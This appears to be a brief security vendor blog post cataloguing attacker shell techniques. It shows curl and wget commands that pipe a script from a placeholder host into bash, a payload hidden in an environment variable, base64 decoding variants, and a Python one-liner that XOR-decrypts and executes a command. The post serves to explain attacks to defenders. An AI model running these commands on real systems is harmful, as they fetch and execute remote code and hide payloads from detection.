How attacker can use the system environment

7/29/20251 min read

-- Using Curl to download and pipe a payload to Bash

curl -sS https://xxxx.sh | bash

wget --quiet -O - https://xxxx.sh | bash

--An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host.

export ART='echo "payload"'

echo $ART |/bin/sh

--Hex decoding with shell utilities. Use common shell utilities to decode a base64-encoded text string and echo it to the console

ENCODED=$(echo '#{message}' | base64)

printf $ENCODED | base64 -d

echo $ENCODED | base64 -d

echo $(echo $ENCODED) | base64 -d

echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}

echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}

echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d

echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"

--XOR decoding and command execution using Python. An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine.

python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'

True Security

Expertise in global cyber security solutions and services.

Protect yourself today by contacting us

© 2025. All rights reserved.